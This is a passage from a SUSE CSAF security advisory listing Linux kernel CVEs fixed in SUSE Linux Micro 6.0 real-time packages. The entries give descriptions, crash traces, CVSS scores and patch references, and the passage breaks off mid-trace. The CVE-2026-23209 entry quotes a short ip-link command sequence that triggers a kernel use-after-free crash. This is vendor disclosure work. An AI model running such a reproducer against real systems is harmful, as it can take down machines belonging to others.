"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23182"
},
{
"cve": "CVE-2026-23190",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23190"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: amd: fix memory leak in acp3x pdm dma ops",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23190",
"url": "https://www.suse.com/security/cve/CVE-2026-23190"
},
{
"category": "external",
"summary": "SUSE Bug 1258397 for CVE-2026-23190",
"url": "https://bugzilla.suse.com/1258397"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23190"
},
{
"cve": "CVE-2026-23191",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23191"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: aloop: Fix racy access at PCM trigger\n\nThe PCM trigger callback of aloop driver tries to check the PCM state\nand stop the stream of the tied substream in the corresponding cable.\nSince both check and stop operations are performed outside the cable\nlock, this may result in UAF when a program attempts to trigger\nfrequently while opening/closing the tied stream, as spotted by\nfuzzers.\n\nFor addressing the UAF, this patch changes two things:\n- It covers the most of code in loopback_check_format() with\n cable-\u003elock spinlock, and add the proper NULL checks. This avoids\n already some racy accesses.\n- In addition, now we try to check the state of the capture PCM stream\n that may be stopped in this function, which was the major pain point\n leading to UAF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23191",
"url": "https://www.suse.com/security/cve/CVE-2026-23191"
},
{
"category": "external",
"summary": "SUSE Bug 1258395 for CVE-2026-23191",
"url": "https://bugzilla.suse.com/1258395"
},
{
"category": "external",
"summary": "SUSE Bug 1258396 for CVE-2026-23191",
"url": "https://bugzilla.suse.com/1258396"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2026-23191"
},
{
"cve": "CVE-2026-23198",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23198"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: Don\u0027t clobber irqfd routing type when deassigning irqfd\n\nWhen deassigning a KVM_IRQFD, don\u0027t clobber the irqfd\u0027s copy of the IRQ\u0027s\nrouting entry as doing so breaks kvm_arch_irq_bypass_del_producer() on x86\nand arm64, which explicitly look for KVM_IRQ_ROUTING_MSI. Instead, to\nhandle a concurrent routing update, verify that the irqfd is still active\nbefore consuming the routing information. As evidenced by the x86 and\narm64 bugs, and another bug in kvm_arch_update_irqfd_routing() (see below),\nclobbering the entry type without notifying arch code is surprising and\nerror prone.\n\nAs a bonus, checking that the irqfd is active provides a convenient\nlocation for documenting _why_ KVM must not consume the routing entry for\nan irqfd that is in the process of being deassigned: once the irqfd is\ndeleted from the list (which happens *before* the eventfd is detached), it\nwill no longer receive updates via kvm_irq_routing_update(), and so KVM\ncould deliver an event using stale routing information (relative to\nKVM_SET_GSI_ROUTING returning to userspace).\n\nAs an even better bonus, explicitly checking for the irqfd being active\nfixes a similar bug to the one the clobbering is trying to prevent: if an\nirqfd is deactivated, and then its routing is changed,\nkvm_irq_routing_update() won\u0027t invoke kvm_arch_update_irqfd_routing()\n(because the irqfd isn\u0027t in the list). And so if the irqfd is in bypass\nmode, IRQs will continue to be posted using the old routing information.\n\nAs for kvm_arch_irq_bypass_del_producer(), clobbering the routing type\nresults in KVM incorrectly keeping the IRQ in bypass mode, which is\nespecially problematic on AMD as KVM tracks IRQs that are being posted to\na vCPU in a list whose lifetime is tied to the irqfd.\n\nWithout the help of KASAN to detect use-after-free, the most common\nsympton on AMD is a NULL pointer deref in amd_iommu_update_ga() due to\nthe memory for irqfd structure being re-allocated and zeroed, resulting\nin irqfd-\u003eirq_bypass_data being NULL when read by\navic_update_iommu_vcpu_affinity():\n\n BUG: kernel NULL pointer dereference, address: 0000000000000018\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 40cf2b9067 P4D 40cf2b9067 PUD 408362a067 PMD 0\n Oops: Oops: 0000 [#1] SMP\n CPU: 6 UID: 0 PID: 40383 Comm: vfio_irq_test\n Tainted: G U W O 6.19.0-smp--5dddc257e6b2-irqfd #31 NONE\n Tainted: [U]=USER, [W]=WARN, [O]=OOT_MODULE\n Hardware name: Google, Inc. Arcadia_IT_80/Arcadia_IT_80, BIOS 34.78.2-0 09/05/2025\n RIP: 0010:amd_iommu_update_ga+0x19/0xe0\n Call Trace:\n \u003cTASK\u003e\n avic_update_iommu_vcpu_affinity+0x3d/0x90 [kvm_amd]\n __avic_vcpu_load+0xf4/0x130 [kvm_amd]\n kvm_arch_vcpu_load+0x89/0x210 [kvm]\n vcpu_load+0x30/0x40 [kvm]\n kvm_arch_vcpu_ioctl_run+0x45/0x620 [kvm]\n kvm_vcpu_ioctl+0x571/0x6a0 [kvm]\n __se_sys_ioctl+0x6d/0xb0\n do_syscall_64+0x6f/0x9d0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n RIP: 0033:0x46893b\n \u003c/TASK\u003e\n ---[ end trace 0000000000000000 ]---\n\nIf AVIC is inhibited when the irfd is deassigned, the bug will manifest as\nlist corruption, e.g. on the next irqfd assignment.\n\n list_add corruption. next-\u003eprev should be prev (ffff8d474d5cd588),\n but was 0000000000000000. (next=ffff8d8658f86530).\n ------------[ cut here ]------------\n kernel BUG at lib/list_debug.c:31!\n Oops: invalid opcode: 0000 [#1] SMP\n CPU: 128 UID: 0 PID: 80818 Comm: vfio_irq_test\n Tainted: G U W O 6.19.0-smp--f19dc4d680ba-irqfd #28 NONE\n Tainted: [U]=USER, [W]=WARN, [O]=OOT_MODULE\n Hardware name: Google, Inc. Arcadia_IT_80/Arcadia_IT_80, BIOS 34.78.2-0 09/05/2025\n RIP: 0010:__list_add_valid_or_report+0x97/0xc0\n Call Trace:\n \u003cTASK\u003e\n avic_pi_update_irte+0x28e/0x2b0 [kvm_amd]\n kvm_pi_update_irte+0xbf/0x190 [kvm]\n kvm_arch_irq_bypass_add_producer+0x72/0x90 [kvm]\n irq_bypass_register_consumer+0xcd/0x170 [irqbypa\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23198",
"url": "https://www.suse.com/security/cve/CVE-2026-23198"
},
{
"category": "external",
"summary": "SUSE Bug 1258321 for CVE-2026-23198",
"url": "https://bugzilla.suse.com/1258321"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23198"
},
{
"cve": "CVE-2026-23202",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23202"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: tegra210-quad: Protect curr_xfer in tegra_qspi_combined_seq_xfer\n\nThe curr_xfer field is read by the IRQ handler without holding the lock\nto check if a transfer is in progress. When clearing curr_xfer in the\ncombined sequence transfer loop, protect it with the spinlock to prevent\na race with the interrupt handler.\n\nProtect the curr_xfer clearing at the exit path of\ntegra_qspi_combined_seq_xfer() with the spinlock to prevent a race\nwith the interrupt handler that reads this field.\n\nWithout this protection, the IRQ handler could read a partially updated\ncurr_xfer value, leading to NULL pointer dereference or use-after-free.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23202",
"url": "https://www.suse.com/security/cve/CVE-2026-23202"
},
{
"category": "external",
"summary": "SUSE Bug 1258338 for CVE-2026-23202",
"url": "https://bugzilla.suse.com/1258338"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2026-23202"
},
{
"cve": "CVE-2026-23207",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23207"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: tegra210-quad: Protect curr_xfer check in IRQ handler\n\nNow that all other accesses to curr_xfer are done under the lock,\nprotect the curr_xfer NULL check in tegra_qspi_isr_thread() with the\nspinlock. Without this protection, the following race can occur:\n\n CPU0 (ISR thread) CPU1 (timeout path)\n ---------------- -------------------\n if (!tqspi-\u003ecurr_xfer)\n // sees non-NULL\n spin_lock()\n tqspi-\u003ecurr_xfer = NULL\n spin_unlock()\n handle_*_xfer()\n spin_lock()\n t = tqspi-\u003ecurr_xfer // NULL!\n ... t-\u003elen ... // NULL dereference!\n\nWith this patch, all curr_xfer accesses are now properly synchronized.\n\nAlthough all accesses to curr_xfer are done under the lock, in\ntegra_qspi_isr_thread() it checks for NULL, releases the lock and\nreacquires it later in handle_cpu_based_xfer()/handle_dma_based_xfer().\nThere is a potential for an update in between, which could cause a NULL\npointer dereference.\n\nTo handle this, add a NULL check inside the handlers after acquiring\nthe lock. This ensures that if the timeout path has already cleared\ncurr_xfer, the handler will safely return without dereferencing the\nNULL pointer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23207",
"url": "https://www.suse.com/security/cve/CVE-2026-23207"
},
{
"category": "external",
"summary": "SUSE Bug 1258524 for CVE-2026-23207",
"url": "https://bugzilla.suse.com/1258524"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23207"
},
{
"cve": "CVE-2026-23208",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23208"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-audio: Prevent excessive number of frames\n\nIn this case, the user constructed the parameters with maxpacksize 40\nfor rate 22050 / pps 1000, and packsize[0] 22 packsize[1] 23. The buffer\nsize for each data URB is maxpacksize * packets, which in this example\nis 40 * 6 = 240; When the user performs a write operation to send audio\ndata into the ALSA PCM playback stream, the calculated number of frames\nis packsize[0] * packets = 264, which exceeds the allocated URB buffer\nsize, triggering the out-of-bounds (OOB) issue reported by syzbot [1].\n\nAdded a check for the number of single data URB frames when calculating\nthe number of frames to prevent [1].\n\n[1]\nBUG: KASAN: slab-out-of-bounds in copy_to_urb+0x261/0x460 sound/usb/pcm.c:1487\nWrite of size 264 at addr ffff88804337e800 by task syz.0.17/5506\nCall Trace:\n copy_to_urb+0x261/0x460 sound/usb/pcm.c:1487\n prepare_playback_urb+0x953/0x13d0 sound/usb/pcm.c:1611\n prepare_outbound_urb+0x377/0xc50 sound/usb/endpoint.c:333",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23208",
"url": "https://www.suse.com/security/cve/CVE-2026-23208"
},
{
"category": "external",
"summary": "SUSE Bug 1258468 for CVE-2026-23208",
"url": "https://bugzilla.suse.com/1258468"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23208"
},
{
"cve": "CVE-2026-23209",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23209"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacvlan: fix error recovery in macvlan_common_newlink()\n\nvalis provided a nice repro to crash the kernel:\n\nip link add p1 type veth peer p2\nip link set address 00:00:00:00:00:20 dev p1\nip link set up dev p1\nip link set up dev p2\n\nip link add mv0 link p2 type macvlan mode source\nip link add invalid% link p2 type macvlan mode source macaddr add 00:00:00:00:00:20\n\nping -c1 -I p1 1.2.3.4\n\nHe also gave a very detailed analysis:\n\n\u003cquote valis\u003e\n\nThe issue is triggered when a new macvlan link is created with\nMACVLAN_MODE_SOURCE mode and MACVLAN_MACADDR_ADD (or\nMACVLAN_MACADDR_SET) parameter, lower device already has a macvlan\nport and register_netdevice() called from macvlan_common_newlink()\nfails (e.g. because of the invalid link name).\n\nIn this case macvlan_hash_add_source is called from\nmacvlan_change_sources() / macvlan_common_newlink():\n\nThis adds a reference to vlan to the port\u0027s vlan_source_hash using\nmacvlan_source_entry.\n\nvlan is a pointer to the priv data of the link that is being created.\n\nWhen register_netdevice() fails, the error is returned from\nmacvlan_newlink() to rtnl_newlink_create():\n\n if (ops-\u003enewlink)\n err = ops-\u003enewlink(dev, \u0026params, extack);\n else\n err = register_netdevice(dev);\n if (err \u003c 0) {\n free_netdev(dev);\n goto out;\n }\n\nand free_netdev() is called, causing a kvfree() on the struct\nnet_device that is still referenced in the source entry attached to\nthe lower device\u0027s macvlan port.\n\nNow all packets sent on the macvlan port with a matching source mac\naddress will trigger a use-after-free in macvlan_forward_source().\n\n\u003c/quote valis\u003e\n\nWith all that, my fix is to make sure we call macvlan_flush_sources()\nregardless of @create value whenever \"goto destroy_macvlan_port;\"\npath is taken.\n\nMany thanks to valis for following up on this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23209",
"url": "https://www.suse.com/security/cve/CVE-2026-23209"
},
{
"category": "external",
"summary": "SUSE Bug 1258518 for CVE-2026-23209",
"url": "https://bugzilla.suse.com/1258518"
},
{
"category": "external",
"summary": "SUSE Bug 1258784 for CVE-2026-23209",
"url": "https://bugzilla.suse.com/1258784"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2026-23209"
},
{
"cve": "CVE-2026-23213",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23213"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/pm: Disable MMIO access during SMU Mode 1 reset\n\nDuring Mode 1 reset, the ASIC undergoes a reset cycle and becomes\ntemporarily inaccessible via PCIe. Any attempt to access MMIO registers\nduring this window (e.g., from interrupt handlers or other driver threads)\ncan result in uncompleted PCIe transactions, leading to NMI panics or\nsystem hangs.\n\nTo prevent this, set the `no_hw_access` flag to true immediately after\ntriggering the reset. This signals other driver components to skip\nregister accesses while the device is offline.\n\nA memory barrier `smp_mb()` is added to ensure the flag update is\nglobally visible to all cores before the driver enters the sleep/wait\nstate.\n\n(cherry picked from commit 7edb503fe4b6d67f47d8bb0dfafb8e699bb0f8a4)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23213",
"url": "https://www.suse.com/security/cve/CVE-2026-23213"
},
{
"category": "external",
"summary": "SUSE Bug 1258465 for CVE-2026-23213",
"url": "https://bugzilla.suse.com/1258465"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23213"
},
{
"cve": "CVE-2026-23214",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23214"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: reject new transactions if the fs is fully read-only\n\n[BUG]\nThere is a bug report where a heavily fuzzed fs is mounted with all\nrescue mount options, which leads to the following warnings during\nunmount:\n\n BTRFS: Transaction aborted (error -22)\n Modules linked in:\n CPU: 0 UID: 0 PID: 9758 Comm: repro.out Not tainted\n 6.19.0-rc5-00002-gb71e635feefc #7 PREEMPT(full)\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014\n RIP: 0010:find_free_extent_update_loop fs/btrfs/extent-tree.c:4208 [inline]\n RIP: 0010:find_free_extent+0x52f0/0x5d20 fs/btrfs/extent-tree.c:4611\n Call Trace:\n \u003cTASK\u003e\n btrfs_reserve_extent+0x2cd/0x790 fs/btrfs/extent-tree.c:4705\n btrfs_alloc_tree_block+0x1e1/0x10e0 fs/btrfs/extent-tree.c:5157\n btrfs_force_cow_block+0x578/0x2410 fs/btrfs/ctree.c:517\n btrfs_cow_block+0x3c4/0xa80 fs/btrfs/ctree.c:708\n btrfs_search_slot+0xcad/0x2b50 fs/btrfs/ctree.c:2130\n btrfs_truncate_inode_items+0x45d/0x2350 fs/btrfs/inode-item.c:499\n btrfs_evict_inode+0x923/0xe70 fs/btrfs/inode.c:5628\n evict+0x5f4/0xae0 fs/inode.c:837\n __dentry_kill+0x209/0x660 fs/dcache.c:670\n finish_dput+0xc9/0x480 fs/dcache.c:879\n shrink_dcache_for_umount+0xa0/0x170 fs/dcache.c:1661\n generic_shutdown_super+0x67/0x2c0 fs/super.c:621\n kill_anon_super+0x3b/0x70 fs/super.c:1289\n btrfs_kill_super+0x41/0x50 fs/btrfs/super.c:2127\n deactivate_locked_super+0xbc/0x130 fs/super.c:474\n cleanup_mnt+0x425/0x4c0 fs/namespace.c:1318\n task_work_run+0x1d4/0x260 kernel/task_work.c:233\n exit_task_work include/linux/task_work.h:40 [inline]\n do_exit+0x694/0x22f0 kernel/exit.c:971\n do_group_exit+0x21c/0x2d0 kernel/exit.c:1112\n __do_sys_exit_group kernel/exit.c:1123 [inline]\n __se_sys_exit_group kernel/exit.c:1121 [inline]\n 